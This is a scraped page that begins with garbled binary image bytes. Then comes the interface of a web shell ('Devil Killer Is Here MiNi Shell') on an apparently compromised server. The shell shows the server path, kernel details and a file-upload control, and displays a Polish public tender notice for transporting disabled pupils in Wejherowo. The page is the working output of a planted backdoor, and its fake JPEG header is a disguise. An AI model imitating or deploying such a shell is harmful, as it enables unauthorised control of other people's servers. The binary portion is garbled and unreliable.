JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230705/0029197201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Transport uczniów niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WEJHEROWSKIE CENTRUM USŁUG WSPÓLNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191250148</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 12 Marca 195</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">centrum@wcuw.wejherowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wcuw.wejherowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Transport uczniów niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b57a2a3e-0e87-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00291972</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00042314/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Transport dzieci niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku szkolnym 2023/2024.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b57a2a3e-0e87-11ee-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e–Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>W przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres centrum@wcuw.wejherowo.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu Platformy e–Zamówienia, która jest dostępna <br/>pod adresem https://ezamowienia.gov.pl<br/>2) Korzystanie z Platformy e–Zamówienia jest bezpłatne. <br/>3) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga <br/>posiadania konta na Platformie e–Zamówienia, ani logowania.<br/>4) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/>publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>5) Szczegółowe informacje na temat zakładania kont podmiotów, wymagań technicznych <br/>oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl <br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>6) Możliwość korzystania w postępowaniu z Formularzy do komunikacji w pełnym <br/>zakresie wymaga posiadania konta Wykonawcy na Platformie e–Zamówienia oraz <br/>zalogowania się na Platformie e–Zamówienia. <br/>7) Do korzystania z Formularzy do komunikacji służących do zadawania pytań <br/>dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta <br/>uproszczonego na Platformie e–Zamówienia. <br/>8) Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do <br/>komunikacji” wynosi 25 MB (wielkość ta dotyczy plików przesyłanych, jako załączniki <br/>do jednego formularza).<br/>9) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z <br/>usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia <br/>określa Regulamin Platformy e-Zamówienia. <br/>10) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem <br/>Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego <br/>dostępnego poprzez formularz udostępniony na stronie internetowej <br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>11)Jeżeli Zamawiający lub Wykonawca przekazują dokumenty elektroniczne za pomocą poczty elektronicznej, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. <br/>12)Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WCUW.271.429.2023.JM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie transportu uczniów <br/>niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek <br/>oświatowych w roku szkolnym 2023/2024.<br/>2. Uczniowie mają być dowożeni zgodnie z planem zajęć szkolnych we wszystkie dni <br/>wynikające z kalendarza roku szkolnego 2023/2024 tj. od poniedziałku do piątku <br/>z wyłączeniem przerw świątecznych i dni ustawowo wolnych, najkrótszą trasą zgodnie z <br/>zasadą „od drzwi do drzwi” to jest: miejsce zamieszkania ucznia - placówka oświatowa<br/>ucznia – miejsce zamieszkania ucznia.<br/>3. Harmonogram dowozu uczniów ustala Wykonawca dowozu na podstawie <br/>otrzymywanych od rodziców uczniów bądź opiekunów planów lekcji lub informacji - należy <br/>uwzględnić przede wszystkim indywidualne godziny dowozów uczniów oraz w miarę <br/>możliwości łączenie kursów, które zakłada się na poziomie minimum 2% w skali<br/>miesięcznego rozliczenia przedłożonego przez Wykonawcę. <br/>4. Do podstawy ustalenia wartości zamówienia Zamawiający określił liczbę uczniów faktycznie <br/>dowożonych w dniu rozpoczęcia procedury udzielenia zamówienia publicznego oraz liczbę <br/>dni roku szkolnego 2023/2024, podczas których realizowany będzie dowóz uczniów do szkół <br/>i placówek.<br/>5. Wykonawca powinien przenalizować topografię miasta Wejherowa i pobliskich miejscowości, <br/>do których będą dowożeni uczniowie, aby ustalić cenę jednostkową za kurs w jedną stronę.<br/>6. Opis usytuowania placówek oświatowych – miejsce świadczenia usług:<br/>1) dowóz do miejscowości, w której znajduję się placówka odbywa się na podstawie <br/>złożonych wniosków przez rodziców uczniów.<br/>2) miejscowości placówek, do których byli dowożeni uczniowie w roku szkolnym <br/>2022/2023 - Wejherowo (7 / 75), Strzepcz (1 / 1), Rumia (1 / 3), w nawiasie liczba <br/>placówek / liczba uczniów.<br/>3) Zamawiający szacuje, że średnia dzienna długość trasy:<br/>a) przewozu jednego ucznia od miejsca zamieszkania do placówki oświatowej lub <br/>od placówki oświatowej do miejsca zamieszkania na terenie miasta Wejherowa<br/>wynosi 4,25 km przyjęta w celu określenia wielkości zadania. Zamawiający <br/>zastrzega, że wielkość ta może ulec zmianie, jednak w sporadycznych <br/>przypadkach nie powinna przekraczać 8 km.<br/>b) przewozu jednego ucznia od miejsca zamieszkania do placówki oświatowej lub <br/>od placówki oświatowej do miejsca zamieszkania poza teren miasta Wejherowa<br/>wynosi 18,50 km przyjęta w celu określenia wielkości zadania. Zamawiający <br/>zastrzega, że wielkość ta może ulec zmianie, jednak w sporadycznych <br/>przypadkach nie powinna przekraczać 30 km.<br/>4) Zamawiający zastrzega możliwość zmiany adresu zamieszkania uczniów, zmiany <br/>adresu placówki oświatowej oraz zmiany tras przejazdu w czasie trwania umowy.<br/>Wykonawcy nie przysługuje z tego tytułu roszczenie<br/>7. Opis ilości dni: <br/>1) Zgodnie z kalendarzem roku szkolnego 2023/2024 planowana ilość dni:<br/>a) szkolnych to: 184 (we wrześniu – 20, październiku – 22, listopadzie - 21, grudniu –<br/>16, styczniu – 19, lutym- 14, marcu - 19, kwietniu – 20, maju – 18, czerwcu – 15),<br/>b) natomiast wychowania przedszkolnego to: 251 (we wrześniu – 20, październiku –<br/>22, listopadzie – 21, grudniu – 19, styczniu – 22, lutym - 21, marcu - 21, kwietniu –<br/>21, maju – 20, czerwcu – 20, lipcu – 23, sierpniu – 21),<br/>2) Zamawiający zastrzega, że ilość dni może ulec zmianie w związku z tym na <br/>zmniejszony ilościowo przedmiot zamówienia Wykonawcy nie przysługuje żadne <br/>roszczenie względem Zamawiającego, gdy środki finansowe nie zostaną w pełni <br/>wykorzystane do upływu terminu realizacji umowy.<br/>8. Opis ilości uczniów:<br/>1) Zamawiający na podstawie poprzedniego roku szkolnego - 2022/2023, zakwalifikował <br/>do przewozu 79 uczniów z uwzględnieniem:<br/>a) dowożonych na terenie miasta Wejherowo było 75 uczniów, <br/>- w tym poruszających się samodzielnie – 69 uczniów, a poruszających się na <br/>wózkach inwalidzkich – 6 uczniów, <br/>- natomiast realizujących wychowanie przedszkolne było 14 uczniów.<br/>b) dowożonych poza miasto Wejherowo było 4 uczniów, <br/>- w tym poruszających się samodzielnie – 2 uczniów, a poruszających się na <br/>wózkach inwalidzkich – 2 uczniów,<br/>- natomiast realizujących wychowanie przedszkolne nie było uczniów.<br/>2) dane dotyczące ilości uczniów są wielkościami szacunkowymi, przyjętymi w celu <br/>porównania ofert i wyboru oferty najkorzystniejszej. Wykonawcy nie przysługuje żadne <br/>roszczenie względem Zamawiającego, gdy środki finansowe nie zostaną w pełni <br/>wykorzystane do upływu terminu realizacji umowy. Jednoczenie Zamawiający <br/>zastrzega sobie możliwość zwiększenia liczby uczniów dowożonych (szacunkowo o 10<br/>uczniów) do momentu nie przekroczenia całkowitej wartości zamówienia ze względu <br/>na absencję szkolną uczniów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Został przedstawiony w rozdziale XIX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas kursu w jedną stronę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas na podstawienie pojazdu zastępczego w przypadku sytuacji awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu <br/>w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów:<br/> Zamawiający uzna warunek za spełniony w zakresie uprawnień, jeżeli:<br/>Wykonawca wykaże, że posiada aktualne uprawnienia do wykonywania <br/>działalności to jest: odpowiednie, zezwolenie lub licencję na wykonywanie <br/>transportu drogowego osób zgodnie z ustawą o transporcie drogowym lub <br/>dokument równoważny.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu <br/>w powyższym zakresie.<br/>d) zdolności technicznej lub zawodowej:<br/> Zamawiający uzna warunek za spełniony w zakresie zdolności technicznej, jeżeli:<br/>Wykonawca wykaże, że dysponuje niezbędnymi do wykonania zamówienia <br/>narzędziami i urządzeniami technicznymi to jest pojazdami wyprodukowanymi <br/>po roku 2008 : <br/> spełniającymi wymagania techniczne określone przepisami – należy <br/>przez to rozumieć pojazdy samochodowe przeznaczone konstrukcyjnie do przewozu nie więcej niż 9 osób łącznie z kierowcą oraz ich bagażu<br/>-<br/>samochody osobowe lub autobusy przeznaczone konstrukcyjnie do <br/>przewozu do 17 osób łącznie z kierowcą<br/>- busy; w ilości zapewniającej <br/>prawidłową realizację przewozu uczniów,<br/> oraz co najmniej dwoma pojazdami specjalistycznymi dostosowanymi <br/>do przewozu osób niepełnosprawnych poruszających się na wózkach <br/>inwalidzkich wskazanych w Rozdziale V SWZ.<br/> Zamawiający uzna warunek za spełniony w zakresie zdolności zawodowej, jeżeli:<br/>Wykonawca wykaże, że dysponuje niezbędnymi do wykonania zamówienia <br/>osobami, które posiadają:<br/> odpowiednie doświadczenie i uprawnienia do kierowania pojazdami <br/>min. 3 lata prawo jazdy odpowiedniej kategorii. Wykonawca musi <br/>zapewnić odpowiednią liczbę kierowców niezbędną do prawidłowej <br/>organizacji dowozu dla wszystkich uprawnionych osób do dowożenia.<br/> ukończony kurs z pierwszej pomocy.<br/> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>spełnienie warunków tiret 1 i 2, Wykonawcy mogą wykazać łącznie. <br/> W przypadku polegania przez Wykonawcę na zdolnościach podmiotu <br/>udostępniającego zasoby, w myśl art. 118 ustawy Pzp, spełnienie warunków tiret 1 <br/>i 2, Wykonawca wraz z innym/i podmiotem/ami mogą wykazać łącznie.<br/><br/>Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada <br/>wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych<br/>Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny <br/>wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia braku podstaw wykluczenia, o których mowa w Rozdziale IX ust. 1 i 2 SWZ:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór stanowi Załącznik nr 5 do SWZ) Nie jest wymagane, gdy w postępowaniu uczestniczył jeden Wykonawca.;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>Zamawiający nie wzywa do złożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w ust. 1, dane umożliwiające dostęp do tych środków. Zamawiający może żądać od <br/>Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie <br/>przez Zamawiającego podmiotowych środków dowodowych lub dokumentów;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których <br/>mowa w Rozdziale VIII ust. 1 pkt 2 SWZ:<br/>a) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za kierowanie pojazdami oraz <br/>koordynowania transportu, wraz z informacjami na temat ich uprawnień <br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do <br/>dysponowania tymi osobami<br/>b) wykazu środków transportu przewidzianych do realizacji zamówienia publicznego <br/>wraz z informacją o podstawie do dysponowania tymi zasobami17<br/>c) aktualnych uprawnień: odpowiednie, zezwolenie lub licencję na <br/>wykonywanie transportu drogowego osób zgodnie z ustawą o transporcie <br/>drogowym.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę, składa się:<br/>1) Formularz oferty zawierający wszystkie informacje i oświadczenia wskazane w jego treści;<br/>2) oświadczenie, o którym mowa w Rozdziale X ust.1 SWZ;<br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli w imieniu Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w Rozdziale X ust. 3 pkt 1 lit. b SWZ ); <br/>4) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XI ust. 3 SWZ wraz z pełnomocnictwem, jeżeli prawo do podpisania zobowiązania nie wynika z dokumentów, o których mowa w Rozdziale X ust. 3 pkt 1 lit. b SWZ (jeżeli dotyczy);<br/>5) oświadczenie podmiotu udostępniającego zasoby, składane na podstawie art. 125 ust. 5 ustawy Pzp, o którym mowa w Rozdziale XI ust. 8 SWZ (jeżeli dotyczy); <br/>6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4 ustawy Pzp, o którym mowa w Rozdziale XII ust. 5 SWZ (jeżeli dotyczy);<br/>7) Dokumenty potwierdzające, że zastrzeżone w ofercie informację stanowią tajemnicę przedsiębiorstwa (jeżeli dotyczy). 